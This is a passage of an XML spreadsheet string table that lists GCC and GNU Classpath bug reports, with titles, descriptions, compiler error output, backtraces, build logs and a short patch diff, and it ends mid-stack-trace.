    <t>unwind-c.c use a HAVE_GETIPINFO preprocessor conditional but never includes auto-target.h so the macro is always undefined.  As a result _Unwind_GetIPInfo is never used.
This causes:
  https://sourceware.org/bugzilla/show_bug.cgi?id=20719
Mailing list discussion:
  https://gcc.gnu.org/ml/gcc/2016-10/msg00165.html</t>
  </si>
  <si>
    <t>GCC-852</t>
  </si>
  <si>
    <t>-ggdb -O causes ICE in dwarf2out.c</t>
  </si>
  <si>
    <t>Running the compiler as shown in comp.out of the included tar file 
results in the following error.  -g3 works nad without -O[23]
it works fine but with -ggdb  and any of the -O flags it fails.
db.world.c:906: Internal compiler error in add_abstract_origin_attribute at dwarf2out.c:8736
   Please submit a full bug report.
   See  for instructions.
Release:
gcc-20001113
Environment:
FreeBSD 4.1.1 i386
How-To-Repeat:
compile the included .i file with -O and -ggdb</t>
  </si>
  <si>
    <t>jwm</t>
  </si>
  <si>
    <t>GCC-34646</t>
  </si>
  <si>
    <t>Ada runtime missing floating point and error handler initialization on OpenBSD</t>
  </si>
  <si>
    <t>Ada runtime (gcc trunk r131220) is missing floating point and error handler initialization on OpenBSD.
Patch avaible at:
http://iki.fi/tero.koskinen/gcc/gcc-ada-init_c.diff
This is originally from Markus Hennecke.
PS. __gnat_error_handler is direct copy of NetBSD equivalent.</t>
  </si>
  <si>
    <t>tero.koskinen</t>
  </si>
  <si>
    <t>CLASSPATH-26803</t>
  </si>
  <si>
    <t>[Graphics2D] Segfault with new glib 2.10</t>
  </si>
  <si>
    <t>Hi 
we got an debian bug report with a segfault of the Graphics2D implementation.
It seems this is related to a new glib 2.10 memory allocator which hit
debian unstable recently.
Debian Bug URL:
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=358356
Discussion on Debian-Devel:
http://lists.debian.org/debian-devel/2006/03/msg00941.html
Wolfgang</t>
  </si>
  <si>
    <t>GCC-15323</t>
  </si>
  <si>
    <t>ICE in create_tmp_var_for</t>
  </si>
  <si>
    <t>Compiling the attached program gives:
[tobi@marktplatz tests]$ ../gcc/build-clean/gcc/f951 reduced.f90
 MAIN__
 t_sum
reduced.f90: At top level:
reduced.f90:21: internal compiler error: in create_tmp_var_for at tree-nested.c:139
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
[tobi@marktplatz tests]$
Backtrace:
(gdb) bt
#0  create_tmp_var_for (info=0x9537f48 type=0xf6d9e3a0
    prefix=0x9537f48 \230}S\t) at ../../gcc-clean/gcc/tree-nested.c:139
#1  0x081166aa in init_tmp_var (info=Variable info is not available.
) at ../../gcc-clean/gcc/tree-nested.c:357
#2  0x08117b61 in convert_nonlocal_reference (tp=0xf6e1925c
    walk_subtrees=0xfee54d68 data=0xfee54e70)
    at ../../gcc-clean/gcc/tree-nested.c:741
#3  0x083c125d in walk_tree (tp=0xf6e1925c
    func=0x81178f0  data=0xfee54e70 htab_=0x0)
    at ../../gcc-clean/gcc/tree-inline.c:2000
#4  0x083c1371 in walk_tree (tp=0xf6e19554
    func=0x81178f0  data=0xfee54e70 htab_=0x0)
    at ../../gcc-clean/gcc/tree-inline.c:2046
#5  0x0811629e in walk_stmts (wi=0xfee54e70 tp=Variable tp is not available.
)
    at ../../gcc-clean/gcc/tree-nested.c:569
#6  0x081163b9 in walk_stmts (wi=0xfee54e70 tp=Variable tp is not available.
)
    at ../../gcc-clean/gcc/tree-nested.c:536
#7  0x08116463 in walk_function (
    callback=0x81178f0  info=Variable info is not
available.
)
    at ../../gcc-clean/gcc/tree-nested.c:592
#8  0x081164c7 in walk_all_functions (
    callback=0x81178f0  root=0xf6d9e3a0)
    at ../../gcc-clean/gcc/tree-nested.c:604
#9  0x081164be in walk_all_functions (
    callback=0x81178f0  root=0xf6d9e3a0)
    at ../../gcc-clean/gcc/tree-nested.c:603
#10 0x0811700c in lower_nested_functions (fndecl=0x9537f48)
    at ../../gcc-clean/gcc/tree-nested.c:1321
#11 0x08090a88 in gfc_generate_function_code (ns=0x9534468)
    at ../../gcc-clean/gcc/fortran/trans-decl.c:2068
#12 0x0808c603 in gfc_generate_code (ns=0x9534468)
    at ../../gcc-clean/gcc/fortran/trans.c:630
#13 0x08072db9 in gfc_parse_file () at ../../gcc-clean/gcc/fortran/parse.c:2485
#14 0x08089605 in gfc_be_parse_file (set_yydebug=0)
    at ../../gcc-clean/gcc/fortran/f95-lang.c:265
#15 0x08374785 in toplev_main (argc=156467016 argv=0xfee55104)
    at ../../gcc-clean/gcc/toplev.c:1638
#16 0x005b2f43 in __libc_start_main () from /lib/tls/libc.so.6
#17 0x0804acc1 in _start ()
(gdb)</t>
  </si>
  <si>
    <t>GCC-78738</t>
  </si>
  <si>
    <t>[7 Regression] ICE in extract_insn at recog.c:2311</t>
  </si>
  <si>
    <t>seen with r243219 on i686-linux-gnu either omitting the -std=c99 or -ffast-math works around it:
$ cat fractal_cache.i
double a
long double roundl()
void b() {
  int c = roundl(a)
  b(c)
}
$ gcc -c -O2 -std=c99 -ffast-math fractal_cache.i 
fractal_cache.i: In function 'b':
fractal_cache.i:6:1: error: unrecognizable insn:
 }
 ^
(insn 10 9 11 2 (set (reg:DF 93)
        (plus:DF (reg:DF 92)
            (reg:DF 95))) fractal_cache.i:4 -1
     (nil))
fractal_cache.i:6:1: internal compiler error: in extract_insn at recog.c:2311
0x85c48cf _fatal_insn(char const* rtx_def const* char const* int char const*)
        ../../src/gcc/rtl-error.c:108
0x85c490c _fatal_insn_not_found(rtx_def const* char const* int char const*)
        ../../src/gcc/rtl-error.c:116
0x8596890 extract_insn(rtx_insn*)
        ../../src/gcc/recog.c:2311
0x83eb32d instantiate_virtual_regs_in_insn
        ../../src/gcc/function.c:1589
0x83eb32d instantiate_virtual_regs
        ../../src/gcc/function.c:1956
0x83eb32d execute
        ../../src/gcc/function.c:2005
Please submit a full bug report
with preprocessed source if appropriate.</t>
  </si>
  <si>
    <t>GCC-9827</t>
  </si>
  <si>
    <t>[3.3/3.4 Regression]: ostream::operator&lt;&lt;(int) doesn't report output errors.</t>
  </si>
  <si>
    <t>ostream::operator&lt;&lt;(int) doesn't change the streams error state if streambuf::overflow returns eof. This works correctly in gcc-3.2.1.
Release:
gcc version 3.4 20030222 (experimental)
Environment:
Red Hat Linux 8.0
How-To-Repeat:
See attachment.</t>
  </si>
  <si>
    <t>GCC-30891</t>
  </si>
  <si>
    <t>poor diagnostic with namespace in the function scope</t>
  </si>
  <si>
    <t>The code:
int main() {
    int i = 0
    namespace foo {
        int j = 0
    }
    return 0
    }
gets you:
~/ootbc/sim$ g++ foo.cc
foo.cc: In function 'int main()':
foo.cc:3: error: expected primary-expression before 'namespace'
foo.cc:3: error: expected `' before 'namespace'
In contrast Comeau gives:
Comeau C/C++ 4.3.8 (Aug 19 2006 13:36:48) for  ONLINE_EVALUATION_Alpha1
Copyright 1988-2006 Comeau Computing.  All rights reserved.
MODE:strict errors C++
ComeauTest.c line 3: error: namespace definition is not allowed
      namespace foo {
      ^
ComeauTest.c line 2: warning: variable i was declared but never referenced
      int i = 0
          ^
1 error detected in the compilation of ComeauTest.c.</t>
  </si>
  <si>
    <t>GCC-490</t>
  </si>
  <si>
    <t>-static / -shared not equivalent to -Wl-Bshared / -Wl-Bdynamic under linux with GNU ld</t>
  </si>
  <si>
    <t>You can't use -shared and -static in a positional way on the gcc command line with GNU ld under linux: if -static is present without -shared all libraries are linked statically.
However you can get this effect by passing -B options to the linker.
I'm not sure whether this is a bug or desired functionality.
Release:
2.95.2
How-To-Repeat:
gcc -g -O2 -o prog prog.o -static -lglib -shared -lm
produces an executable with all libraries dynamically linked
but
gcc -g -O2 -o prog prog.o -Wl-Bstatic -lglib -Wl-Bdynamic
statically links libglib and nothing else.</t>
  </si>
  <si>
    <t>histed</t>
  </si>
  <si>
    <t>GCC-78309</t>
  </si>
  <si>
    <t>[5/6 Regression] ICE: in get_hash at ipa-icf.c:2124</t>
  </si>
  <si>
    <t>During Firefox LTO build I get:
lto1: internal compiler error: in get_hash at ipa-icf.c:2124
0x11021833 ipa_icf::sem_variable::get_hash()
        ../../gcc/gcc/ipa-icf.c:2124
0x11020a1f ipa_icf::sem_item::update_hash_by_local_refs(hash_map ipa_icf::sem_item*&gt; &gt;&amp;)
        ../../gcc/gcc/ipa-icf.c:843
0x1102eb93 ipa_icf::sem_item_optimizer::update_hash_by_addr_refs()
        ../../gcc/gcc/ipa-icf.c:2750
0x11031153 ipa_icf::sem_item_optimizer::execute()
        ../../gcc/gcc/ipa-icf.c:2612
0x110345cf ipa_icf_driver
        ../../gcc/gcc/ipa-icf.c:3552
0x110345cf ipa_icf::pass_ipa_icf::execute(function*)
        ../../gcc/gcc/ipa-icf.c:3599</t>
  </si>
  <si>
    <t>GCC-39063</t>
  </si>
  <si>
    <t>libgcc2.c:mprotect() for mingw incompatible pointer type warning</t>
  </si>
  <si>
    <t>in windows replacement of mprotect() in libgcc2.c uses VirtualProtect
which requires an unsigned not a signed ptr as its last argument. the
attached patch fixes a 'may be used uninitialized' warning too.
here are the warnings:
../../../gcc-svn/libgcc/../gcc/libgcc2.c: In function 'mprotect':
../../../gcc-svn/libgcc/../gcc/libgcc2.c:2079: warning: passing argument 4 of 'VirtualProtect' from incompatible pointer type
/opt/buildroot/gcc-svn/winsup/mingw/include/winbase.h:1126: note: expected 'PDWORD' but argument is of type 'int *'
../../../gcc-svn/libgcc/../gcc/libgcc2.c:2064: warning: 'np' may be used uninitialized in this function</t>
  </si>
  <si>
    <t>GCC-39216</t>
  </si>
  <si>
    <t>[LTO]: gcc_update doesn't touch generated files in lto-plugin</t>
  </si>
  <si>
    <t>contrib/gcc_update doesn't touch generated files in lto-plugin.
As the result autoconf/automake are needed for gcc build.</t>
  </si>
  <si>
    <t>GCC-60585</t>
  </si>
  <si>
    <t>Virtual function related memory access errors with multiple virtual inheritance</t>
  </si>
  <si>
    <t>Created attachment 32392
Simplified C++ test example
The attached reduced example causes valgrind to complain about access to uninitialized value when built with gcc-4.9.0 20140318 on Linux (both i86 and x86_64 included output is from 32 bit version):
andpav@andris-HP-Z230:~/Tests/2014-03-18$ g++-4.9 -O2 -Wall -Wextra virtual.cpp 
andpav@andris-HP-Z230:~/Tests/2014-03-18$ valgrind ./a.out 
==10812== Memcheck a memory error detector
==10812== Copyright (C) 2002-2013 and GNU GPL'd by Julian Seward et al.
==10812== Using Valgrind-3.9.0 and LibVEX rerun with -h for copyright info
==10812== Command: ./a.out
==10812== 
==10812== Use of uninitialised value of size 4
==10812==    at 0x80484C6: virtual thunk to F::f() const (in /home/andpav/Tests/2014-03-18/a.out)
==10812==    by 0x8048379: main (in /home/andpav/Tests/2014-03-18/a.out)
==10812== 
==10812== 
==10812== HEAP SUMMARY:
==10812==     in use at exit: 0 bytes in 0 blocks
==10812==   total heap usage: 0 allocs 0 frees 0 bytes allocated
==10812== 
==10812== All heap blocks were freed -- no leaks are possible
==10812== 
==10812== For counts of detected and suppressed errors rerun with: -v
==10812== Use --track-origins=yes to see where uninitialised values come from
==10812== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)
andpav@andris-HP-Z230:~/Tests/2014-03-18$ g++-4.9 -v
Using built-in specs.
COLLECT_GCC=g++-4.9
COLLECT_LTO_WRAPPER=/usr/local/libexec/gcc/i686-pc-linux-gnu/4.9.0/lto-wrapper
Target: i686-pc-linux-gnu
Configured with: ../gcc-4.9-20140318/configure --program-suffix=-4.9 --enable-languages=cc++ --enable-lto
Thread model: posix
gcc version 4.9.0 20140318 (experimental) (GCC) 
There are also ocasional crashes (SIGSEGV) in real software from which the reduced example has been created.
Also reproduced with gcc-4.8 (Fedora 20 x86_64 and Ubuntu 13.10 i686) and
gcc-4.7 (Ubuntu-13.10 i686). Does not happen with gcc-4.6 (Ubuntu 12.04)
Also specifying -fno-inline-small-functions together with -O2 or -O3 for affected gcc versions make the problem not happen (both reduced example and real software)</t>
  </si>
  <si>
    <t>GCC-61212</t>
  </si>
  <si>
    <t>gcc build failure on dos file system due to warnings treated as errors</t>
  </si>
  <si>
    <t>gcc trunk and fortran-dev build failure
../../libcpp/files.c:393:56: error: suggest parentheses around â€˜&amp;&amp;â€™ within â€˜||â€™
[-Werror=parentheses]
       if (CPP_OPTION (pfile canonical_system_headers) &amp;&amp; file-&gt;dir-&gt;sysp
                                                        ^
cc1plus: all warnings being treated as errors
Adding the parens as suggested has been working:
      if ((CPP_OPTION (pfile canonical_system_headers) &amp;&amp; file-&gt;dir-&gt;sysp)
#ifdef HAVE_DOS_BASED_FILE_SYSTEM
          || !file-&gt;dir-&gt;sysp
#endif
         )
Apparently this is exposed only on dos based file system.</t>
  </si>
  <si>
    <t>GCC-4060</t>
  </si>
  <si>
    <t>Failure building eh_alloc.o for C++ on 'make bootstrap'</t>
  </si>
  <si>
    <t>Created and cd'd to a build directory
Ran: ../gcc-3.0/configure  --enable-languages=cc++ --enable-threads
Ran: make bootstrap
Info for gcc:
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.0/specs
Configured with: ../gcc-3.0/configure --enable-languages=c
Thread model: single
gcc version 3.0
(from gcc-3.0.tar.gz host&amp;target are i686-pc-linux-gnu)
Make failed with:
In file included from ../../../../gcc-3.0/libstdc++-v3/libsupc++/eh_alloc.cc:39:
../include/bits/gthr.h:29:2: invalid preprocessing directive #_GLIBCPP_ifndef
../include/bits/gthr.h:30:2: invalid preprocessing directive #_GLIBCPP_define
../include/bits/gthr.h:84:2: invalid preprocessing directive #_GLIBCPP_if
../include/bits/gthr.h:85:2: invalid preprocessing directive #_GLIBCPP_include
../include/bits/gthr.h:86:2: invalid preprocessing directive #_GLIBCPP_elif
../include/bits/gthr.h:87:2: invalid preprocessing directive #_GLIBCPP_include
../include/bits/gthr.h:88:2: invalid preprocessing directive #_GLIBCPP_elif
../include/bits/gthr.h:89:2: invalid preprocessing directive #_GLIBCPP_include
../include/bits/gthr.h:92:2: invalid preprocessing directive #_GLIBCPP_elif
../include/bits/gthr.h:93:2: invalid preprocessing directive #_GLIBCPP_if
../include/bits/gthr.h:94:2: invalid preprocessing directive #_GLIBCPP_ifndef
../include/bits/gthr.h:95:2: invalid preprocessing directive #_GLIBCPP_define
../include/bits/gthr.h:96:2: invalid preprocessing directive #_GLIBCPP_endif
../include/bits/gthr.h:97:2: invalid preprocessing directive #_GLIBCPP_endif
../include/bits/gthr.h:98:2: invalid preprocessing directive #_GLIBCPP_include
../include/bits/gthr.h:101:2: invalid preprocessing directive #_GLIBCPP_else
../include/bits/gthr.h:102:2: invalid preprocessing directive #_GLIBCPP_include
../include/bits/gthr.h:103:2: invalid preprocessing directive #_GLIBCPP_endif
../include/bits/gthr.h:105:2: invalid preprocessing directive #_GLIBCPP_endif
make[4]: *** [eh_alloc.lo] Error 1
make[4]: Leaving directory `/home/mikef/gcc-build/i686-pc-linux-gnu/libstdc++-v3/libsupc++'
make[3]: *** [all-recursive] Error 1
make[3]: Leaving directory `/home/mikef/gcc-build/i686-pc-linux-gnu/libstdc++-v3'
make[2]: *** [all-recursive-am] Error 2
make[2]: Leaving directory `/home/mikef/gcc-build/i686-pc-linux-gnu/libstdc++-v3'
make[1]: *** [all-target-libstdc++-v3] Error 2
make[1]: Leaving directory `/home/mikef/gcc-build'
make: *** [bootstrap] Error 2
Release:
gcc-3.0.0
Environment:
Stock Mandrake 8.0
System is an AMD 1.33 GHz w/ 512 MB SDRAM
How-To-Repeat:
All variations I tried that build c++ fail at this point.
(configure and make w/o options 
configure --enable-languages=c++ make
configure i586_linux make bootstrap)</t>
  </si>
  <si>
    <t>mrfitz</t>
  </si>
  <si>
    <t>GCC-9139</t>
  </si>
  <si>
    <t>mauve tests require installation</t>
  </si>
  <si>
    <t>Currently running the Mauve test suite requires
that gcj be installed.  We must support uninstalled
use as well.
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-46024</t>
  </si>
  <si>
    <t>g++.dg/warn/miss-format-1.C FAILs on Solaris 8 and 9</t>
  </si>
  <si>
    <t>Created attachment 22043
preprocessed input (from Solaris 8/x86) for miss-format-1.C
The g++.dg/warn/miss-format-1.C FAILs on both Solaris 8 and 9/x86 and
Solaris 8/SPARC but not on Solaris 9/SPARC:
i386-pc-solaris2.8:
FAIL: g++.dg/warn/miss-format-1.C printf attribute warning (test for warnings line 17)
FAIL: g++.dg/warn/miss-format-1.C printf attribute warning 2 (test for warnings line 42)
FAIL: g++.dg/warn/miss-format-1.C (test for excess errors)
Excess errors:
/vol/gcc/src/hg/trunk/local/gcc/testsuite/g++.dg/warn/miss-format-1.C:26:18: error: 'vscanf' was not declared in this scope
i386-pc-solaris2.9:
FAIL: g++.dg/warn/miss-format-1.C printf attribute warning (test for warnings line 17)
FAIL: g++.dg/warn/miss-format-1.C printf attribute warning 2 (test for warnings line 42)
sparc-sun-solaris2.8:
FAIL: g++.dg/warn/miss-format-1.C (test for excess errors)
Excess errors:
/vol/gcc/src/hg/trunk/local/gcc/testsuite/g++.dg/warn/miss-format-1.C:26:18: error: 'vscanf' was not declared in this scope
It seems strange to get that excess error even though there's a dg-error
covering exactly that situation.
But what's even more strange is that the Solaris 8 and 9/x86 compilers don't
warn for lines 17 and 42 for exactly the same preprocessed input that the
Solaris 8/SPARC compiler warns about:
s8sparc% gcc -Wmissing-format-attribute -S miss-format-1.ii
miss-format-1.ii: In function 'void foo(const char* ...)':
miss-format-1.ii:123:19: warning: function might be possible candidate for 'gnu_printf' format attribute [-Wmissing-format-attribute]
miss-format-1.ii: In function 'void bar(const char* ...)':
miss-format-1.ii:131:18: error: 'vscanf' was not declared in this scope
miss-format-1.ii: In function 'void vfoo(const char* va_list)':
miss-format-1.ii:145:20: warning: function might be possible candidate for 'gnu_printf' format attribute [-Wmissing-format-attribute]
s9x86% gcc -Wmissing-format-attribute -S miss-format-1.ii
miss-format-1.s8x86.ii: In function 'void bar(const char* ...)':
miss-format-1.s8x86.ii:131:18: error: 'vscanf' was not declared in this scope
I'd have expected such a warning to be target-independent.</t>
  </si>
  <si>
    <t>GCC-1070</t>
  </si>
  <si>
    <t>incorrect specialization of std::complex</t>
  </si>
  <si>
    <t>In bits/std_complex.h the explicit specialization for
one operator-= is wrong:
  template
    inline complex&amp;
    complex::operator-=(const complex&amp; __z)
    {
     __real__ _M_value -= __z.real()
     __imag__ _M_value -= __z.real()  // &lt;--- here
     return *this
    }
Release:
CVS checkout: gcc version 2.97 20001214 (experimental)
Environment:
Linux shadow.robots.ox.ac.uk 2.2.17 #3 SMP Mon Nov 6 20:09:01 GMT 2000 i686 unknown</t>
  </si>
  <si>
    <t>fsm</t>
  </si>
  <si>
    <t>GCC-1794</t>
  </si>
  <si>
    <t>Reading specs from /usr/bin/../lib/gcc-lib/i386-pc-linux-gnu/2.97/specs
Configured with: ../configure --prefix=/tmp/gcc-20010126-root/usr/local --enable-shared --enable-threads
 --disable-checking i386-pc-linux-gnu
gcc version 2.97 20010126 (experimental)
 /usr/bin/../lib/gcc-lib/i386-pc-linux-gnu/2.97/cpp0 -lang-c++ -D_GNU_SOURCE -D__GNUG__=2 -D__GXX_ABI_VE
RSION=100 -v -I/home/rafa/src/mpcl/include -I/home/rafa/src/mpcl/include/mpcl -iprefix /usr/bin/../lib/g
cc-lib/i386-pc-linux-gnu/2.97/ -D__GNUC__=2 -D__GNUC_MINOR__=97 -D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix
 -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__STDC_HOSTED__=1 -Wall -W
 -Wpointer-arith -pedantic -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i386__ -D__PIC_
_ -D__pic__ -D_REENTRANT -DPIC smart_pointer.cc smart_pointer.ii
GNU CPP version 2.97 20010126 (experimental) (cpplib) (i386 Linux/ELF)
ignoring nonexistent directory /tmp/gcc-20010126-root/usr/local/include/g++-v3
ignoring nonexistent directory /tmp/gcc-20010126-root/usr/local/i386-pc-linux-gnu/include/g++-v3
ignoring nonexistent directory /tmp/gcc-20010126-root/usr/local/lib/gcc-lib/i386-pc-linux-gnu/2.97/incl
ude
ignoring nonexistent directory /tmp/gcc-20010126-root/usr/local/i386-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /home/rafa/src/mpcl/include
 /home/rafa/src/mpcl/include/mpcl
 /usr/include/g++-v3
 /usr/lib/gcc-lib/i386-pc-linux-gnu/2.97/include
 /usr/i386-pc-linux-gnu/include
 /usr/local/include
 /usr/include
End of search list.
 /usr/bin/../lib/gcc-lib/i386-pc-linux-gnu/2.97/cc1plus -fpreprocessed smart_pointer.ii -quiet -dumpbase
 smart_pointer.cc -g -Wall -W -Wpointer-arith -pedantic -version -fPIC -o smart_pointer.s
GNU CPP version 2.97 20010126 (experimental) (cpplib) (i386 Linux/ELF)
GNU C++ version 2.97 20010126 (experimental) (i386-pc-linux-gnu)
        compiled by GNU C version 2.97 20010126 (experimental).
smart_pointer.cc:225: Internal error: Segmentation fault.
Please submit a full bug report with preprocessed source
if appropriate.  See  for instructions.
Release:
gcc version 2.97 20010126 (experimental)
Environment:
Linux 2.2.16-22 i586</t>
  </si>
  <si>
    <t>GCC-65693</t>
  </si>
  <si>
    <t>[4.8/4.9 Regression] ICE in assign_by_spills at lra-assigns.c:1419</t>
  </si>
  <si>
    <t>Created attachment 35251
snip of the build log
I can't build anymore virtualbox with gcc 5-20150404-1 in experimental (medium)  (debian experimental)
gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-linux-gnu/5/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Debian 5-20150404-1' --with-bugurl=file:///usr/share/doc/gcc-5/README.Bugs --enable-languages=cadac++javagofortranobjcobj-c++ --prefix=/usr --program-suffix=-5 --enable-shared --enable-linker-build-id --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --with-default-libstdcxx-abi=c++98 --enable-gnu-unique-object --disable-vtable-verify --enable-libmpx --enable-plugin --with-system-zlib --disable-browser-plugin --enable-java-awt=gtk --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-5-amd64/jre --enable-java-home --with-jvm-root-dir=/usr/lib/jvm/java-1.5.0-gcj-5-amd64 --with-jvm-jar-dir=/usr/lib/jvm-exports/java-1.5.0-gcj-5-amd64 --with-arch-directory=amd64 --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --enable-objc-gc --enable-multiarch --with-arch-32=i586 --with-abi=m64 --with-multilib-list=m32m64mx32 --enable-multilib --with-tune=generic --enable-checking=yes --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 5.0.0 20150404 (experimental) [trunk revision 221867] (Debian 5-20150404-1) 
attaching the build log the build log2 with -Wall -Wextra -fno-strict-aliasing and the preprocessed source</t>
  </si>
  <si>
    <t>GCC-24614</t>
  </si>
  <si>
    <t>gcc.dg/nested-func-4.c (test for excess errors) fails</t>
  </si>
  <si>
    <t>FAIL: gcc.dg/nested-func-4.c (test for excess errors)
(a new test) appeared on mainline on hppa2.0w-hp-hpux11.11 between 20051026 and 20051027.
Excess errors:
Warning: consider linking with `-static' as system libraries with
  profiling support are only provided in archive format
Some other profiling tests link with -static on hppa*-*-hpux* probably this one should as well.</t>
  </si>
  <si>
    <t>GCC-10698</t>
  </si>
  <si>
    <t>Re: [cpp patch] bootstrap/7312: bootstrap failure due to invalid use</t>
  </si>
  <si>
    <t xml:space="preserve"> Dara Hazeghi wrote:
 &gt; could somebody determine whether the patch attached to the report (in  
 &gt; GNATS) is correct for 3.3.1 and whether this sort of problem still  
 &gt; exists in 3.4? Thanks
 I think it needs a comment but otherwise it is good.  Since neither of 
 you appear to have check in priviledges I will try to do this myself 
 tomorrow.  I need to do a bootstrap first to verify the patch as per the 
 usual checkin rules.
 Jim
Release:
unknown
Unformatted:
  of errno</t>
  </si>
  <si>
    <t>GCC-11029</t>
  </si>
  <si>
    <t>pentiumiii/pentium3/pentiumiv/pentium4 aren't recognized</t>
  </si>
  <si>
    <t>I can't use pentiumiii/pentium3/pentiumiv/pentium4-linux to
configure gcc.</t>
  </si>
  <si>
    <t>GCC-52691</t>
  </si>
  <si>
    <t>[4.7/4.8 Regression] va_start to builtin_next_arg optimization lost</t>
  </si>
  <si>
    <t>In the commit below the following edit was made which inverted the sense of the test preventing the optimization from applying when it should.  A ! must be inserted before builtin_decl_explicit_p.
diff --git a/gcc/tree-ssa-ccp.c b/gcc/tree-ssa-ccp.c
index e207e23..31c31c1 100644
--- a/gcc/tree-ssa-ccp.c
+++ b/gcc/tree-ssa-ccp.c
@@ -21757 +21757 @@ optimize_stdarg_builtin (gimple call)
     case BUILT_IN_VA_START:
       if (!va_list_simple_ptr
          || targetm.expand_builtin_va_start != NULL
-          || built_in_decls[BUILT_IN_NEXT_ARG] == NULL)
+          || builtin_decl_explicit_p (BUILT_IN_NEXT_ARG))
        return NULL_TREE
       if (gimple_call_num_args (call) != 2)
commit b9a1687032fc1afb5f4e9d8dfa775a134abe21ba
Author: meissner 
Date:   Tue Oct 11 19:55:09 2011 +0000
    Convert standard builtin functions from being arrays to using a functional interface
    git-svn-id: svn+ssh://gcc.gnu.org/svn/gcc/trunk@179820 138bc75d-0d04-0410-961f-82ee72b054a4</t>
  </si>
  <si>
    <t>pab</t>
  </si>
  <si>
    <t>GCC-19240</t>
  </si>
  <si>
    <t>[4.0 Regression] runtime performance regression in floating point heavy code x86/SSE</t>
  </si>
  <si>
    <t>I'm seeing a significant runtime performance regression (&gt;15%) with snapshots
following gcc-4.0-20041205 as far as i can see there's some issues when the
register pressure builds up: in later versions the fpu gets involved when former
version didn't.
The &gt;15% figure comes from larger application (a raytracer) branch predictions
also changed (but i've fixed that) so i'm reasonably sure the problem is what's
demonstrated in the attached testcase.
Switches: -march=k8 -mfpmath=sse -O3 -ffast-math -fomit-frame-pointer
with gcc-4.0-20041205:
[snip]
  4010f4:       movss  (%ecx%esi4)%xmm0
  4010f9:       movss  (%eax%ebx4)%xmm5
  4010fe:       movss  (%eax%esi4)%xmm7
  401103:       mulss  %xmm5%xmm1
  401107:       movss  (%ecx%ebx4)%xmm4
  40110c:       movss  %xmm0(%esp)
  401111:       mulss  %xmm4%xmm2
  401115:       movaps %xmm3%xmm0
  401118:       subss  (%ecx%edx4)%xmm6
  40111d:       addss  (%eax%edx4)%xmm1
  401122:       mulss  (%esp)%xmm3
  401127:       mulss  %xmm7%xmm0
  40112b:       subss  %xmm2%xmm6
  40112f:       xorps  %xmm2%xmm2
  401132:       addss  %xmm0%xmm1
  401136:       subss  %xmm3%xmm6
  40113a:       divss  %xmm1%xmm6
  40113e:       mulss  %xmm6%xmm7
  401142:       comiss 0x0(%ebp)%xmm6
  401146:       mulss  %xmm6%xmm5
  40114a:       addss  (%esp)%xmm7
with gcc-4.0-20050102:
[snip]
  4010ff:       movss  (%ecx%esi4)%xmm0
  401104:       movss  (%eax%ebx4)%xmm5
  401109:       movss  (%eax%esi4)%xmm7
  40110e:       mulss  %xmm5%xmm1
  401112:       movss  (%ecx%ebx4)%xmm4
  401117:       movss  %xmm00x4(%esp)
  40111d:       mulss  %xmm4%xmm2
  401121:       movaps %xmm3%xmm0
  401124:       flds   (%ecx%edx4)
  401127:       addss  (%eax%edx4)%xmm1
  40112c:       mulss  0x4(%esp)%xmm3
  401132:       fsubrs 0xc(%edi)
  401135:       mulss  %xmm7%xmm0
  401139:       addss  %xmm0%xmm1
  40113d:       fstps  (%esp)
  401140:       movss  (%esp)%xmm6
  401145:       subss  %xmm2%xmm6
  401149:       xorps  %xmm2%xmm2
  40114c:       subss  %xmm3%xmm6
  401150:       divss  %xmm1%xmm6
  401154:       mulss  %xmm6%xmm7
  401158:       comiss 0x0(%ebp)%xmm6
  40115c:       mulss  %xmm6%xmm5
  401160:       addss  0x4(%esp)%xmm7</t>
  </si>
  <si>
    <t>GCC-11381</t>
  </si>
  <si>
    <t>[3.3/3.4 regression] volatile memory access optimized away</t>
  </si>
  <si>
    <t>Example code:
void
flash_wait_ready(volatile unsigned *vaddr)
{
    while (*vaddr != *vaddr)
}
Using gcc 3.3 (tested with arm-elf and i686-pc-linux-gnu) the loop in the
example above is incorrectly removed by the optimizer when using -O. Correct
code is generated using -O2 -O3 and -Os. Here is the -O case:
&gt; gcc -S -o - -O tmp.c
    .file    tmp.c
    .text
.globl flash_wait_ready
    .type    flash_wait_ready @function
flash_wait_ready:
    pushl    %ebp
    movl    %esp %ebp
    popl    %ebp
    ret
    .size    flash_wait_ready .-flash_wait_ready
    .ident    GCC: (GNU) 3.3
&gt;
It's a regression from GCC 3.2.3 which generates correct code with -O.
[I know the code looks funny but as the function name indicates I'm waiting for
a flash memory to finish. When the flash is busy two consecutive read accesses
will not read the same value.]
/Tobias</t>
  </si>
  <si>
    <t>CLASSPATH-19862</t>
  </si>
  <si>
    <t>Swing JTextField fails with StringIndexOutOfBoundsException</t>
  </si>
  <si>
    <t>Entering text into a JTextField fails with an StringIndexOutOfBoundsException
triggered by a problem in GapContent or AbstractDocument.getText().
Tested with gcc-4.0-20050130 snapshot and a current (2005.02.09) cvs
checkout of gui-branch-20040128:
java.lang.StringIndexOutOfBoundsException
   at java.lang.StringBuffer.substring(int int) (/usr/lib/libgcj.so.6.0.0)
   at javax.swing.text.GapContent.getString(int int)
(/usr/lib/lib-javax-swing.so.0.0.0)
   at javax.swing.text.AbstractDocument.getText(int int)
(/usr/lib/lib-javax-swing.so.0.0.0)
   at javax.swing.text.FieldView.getPreferredSpan(int)
